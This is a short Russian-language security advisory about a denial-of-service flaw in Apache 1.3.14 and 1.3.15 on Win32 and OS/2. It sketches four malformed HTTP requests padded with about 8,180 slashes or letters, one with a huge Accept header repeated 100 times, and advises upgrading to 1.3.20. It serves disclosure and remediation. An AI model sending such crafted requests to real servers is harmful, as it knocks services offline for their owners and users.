Правильно построенная конструкция URL может вывести из строя Apache сервер на платформах WIN32 и OS2. Дыра работает на версиях 1.3.14, 1.3.15, на версии 1.3.20 не работает.

Пример:

1) GET (a string of 8184 «/») /

2) HEAD /(a string of 8182 «A») /

3) GET (a string of 8184 «/») /

for 100 times:
Accept: (8182 of «/»)

4) GET (a string of 8177 «/») HTTP/1.0

Для устранения ошибки скачайте версию 1.3.20:

http://httpd.apache.org/dist/httpd/



Оставить мнение